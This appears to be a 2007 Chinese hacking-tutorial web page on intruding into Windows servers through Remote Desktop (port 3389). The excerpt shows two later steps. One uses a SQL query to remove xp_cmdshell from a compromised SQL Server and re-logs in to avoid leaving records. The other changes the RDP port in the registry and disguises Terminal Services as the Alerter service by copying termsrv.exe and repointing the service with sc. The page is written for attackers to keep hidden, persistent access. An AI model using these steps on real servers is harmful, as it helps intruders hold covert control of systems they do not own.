| 高手解析如何入侵3389 |
| 责任编辑:酷酷の鱼 更新日期:2007-11-21 |
|
|
|
七.打SA空口令补丁
程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的)
-->>Windowst身位验证登陆
复制一下代码:SELMIS
if exists (select * from dbo.sysobjects where id
= object_id(N\’[dbo].[xp_cmdshell]\’)
and OBJECTPROPERTY(id, N\’IsExtendedProc\’)
= 1) exec sp_dropextendedproc N\’[dbo].[xp_cmdshell]\’GO
按F5(运行),关了退出SQL Server再用SQL Server身位验证进一次,退出(这是为了不留下记录)。
八.改3389端口和服务名称
修改服务器端的端口设置,注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp],PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。
第二个地方:
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。
要重启系统才能用新端口连。(不急..改了他的服务名再重启系统吧)
导出3389服务的
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]
的键值为mm.reg文件。编辑mm.reg文件,替换TermService为Alerter(错误警告服务..别的服务也行) 。再把第十行的"Description"="(这里是服务说明,改为你所换的服务说明,这里改为通知所选用户和计算机有关系统管理级警报。)"第十一行的"DisplayName"="(这里是服务名称,改为你所换的服务名称,这里改为Alerter)。保存,再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先停止)。
再在CMD下
CD c:\\winnt\\
system32 copy termsrv.exe service.exe
(这里是复制termsrv.exe为Alerter服务文件名差不多的文件)
CD C:\\winnt sc \\\\127.0.0.1 config Alerter binpath=
c:\\winnt\\system32\\service.exe
(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写)
|
|
| 上一篇文章: 简单网站入侵(适合菜鸟) |
| 下一篇文章: ASP.NET备份db日志获得webshell |
|
|
|
|
